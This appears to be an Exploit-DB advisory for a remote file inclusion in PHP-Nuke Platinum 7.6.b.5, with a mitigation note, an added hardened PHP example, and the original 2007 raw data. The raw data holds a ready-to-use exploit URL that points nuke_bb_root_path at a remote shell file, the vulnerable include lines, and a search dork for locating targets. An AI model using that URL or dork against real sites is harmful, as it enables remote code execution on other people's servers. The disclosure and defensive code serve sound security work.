Vendor: Platinum
By: BiNgZa AKA RaZor
CVSS: 5.5 (MEDIUM)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: Platinum
Affected Version From: Platinum 7.6.b.5
Affected Version To: Platinum 7.6.b.5
Patch Exists: NO
Related CWE:
CPE: a:phpnuke:platinum:7.6.b.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in Platinum 7.6.b.5 Php_Nuke_Fusion

The vulnerability allows an attacker to include a remote file in the application, which can lead to remote code execution or other malicious activities.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization techniques. Additionally, disabling the 'register_globals' setting can help prevent this type of vulnerability.
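
An added example (not Platinum's code and not part of the advisory) showing a hardened form of the two includes quoted in the raw data below: the base path is assigned in code, a request that tries to supply a path variable is refused, and each file name must resolve to a local file inside the forum directory. The function names, the `PATH_VARS` list and the temporary directory standing in for `modules/Forums/` are assumptions.

```php
<?php
// Added example, not Platinum's code. Function names are hypothetical.
// Pattern from the advisory (favorites.php): $phpbb_root_path is assigned,
// but the includes use $nuke_bb_root_path, which is never assigned, so with
// register_globals=On the request parameter decides where include() reads from.

const PATH_VARS = ['nuke_bb_root_path', 'phpbb_root_path', 'phpEx'];

/** True if the request tries to supply any variable used to build an include path. */
function request_sets_path_var(array $request): bool
{
    return (bool) array_intersect(PATH_VARS, array_keys($request));
}

/** Resolve $file under the fixed $baseDir; null unless it is a local file inside it. */
function resolve_include(string $baseDir, string $file): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $file)) {
        return null;                    // plain file names only: no slashes, no scheme
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $full === false) {
        return null;                    // missing directory or file
    }
    // The resolved path must still sit inside the base directory.
    return strpos($full, $base . DIRECTORY_SEPARATOR) === 0 ? $full : null;
}

// Constructed demo: a temporary directory stands in for modules/Forums/.
$forums = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'forums_demo_' . getmypid();
mkdir($forums);
file_put_contents($forums . '/extension.inc', "<?php \$phpEx = 'php';\n");

$hostile = ['nuke_bb_root_path' => 'http://localhost/shell.txt?']; // value from the advisory
$benign  = ['mode' => 'list'];                                     // constructed

echo 'hostile request refused: ', var_export(request_sets_path_var($hostile), true), "\n";
echo 'benign request refused:  ', var_export(request_sets_path_var($benign), true), "\n";

$nuke_bb_root_path = $forums;           // assigned in code, never taken from input
$path = resolve_include($nuke_bb_root_path, 'extension.inc');
if ($path !== null) {
    include $path;                      // local file only; it sets $phpEx
}
echo 'phpEx after include: ', var_export($phpEx ?? null, true), "\n";
echo 'traversal resolved to: ', var_export(resolve_include($forums, '../x'), true), "\n";

unlink($forums . '/extension.inc');
rmdir($forums);
```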

Exploit-DB raw data:

----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To
----------------------------------------------
 A2J, Chucks, The Pitbull, ICQBomber, str0ke
----------------------------------------------
BiG sHoUt OuT tO udplink.net & ascnet.biz :)
----------------------------------------------



Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:

----------------------------------------------
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
include($nuke_bb_root_path . 'common.'.$phpEx);

----------------------------------------------

----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by Platinum 7.6.b.5
----------------------------------------------
shadowcrew@hotmail.co.uk
----------------------------------------------
shadow.php0h.com
----------------------------------------------

# milw0rm.com [2007-10-23]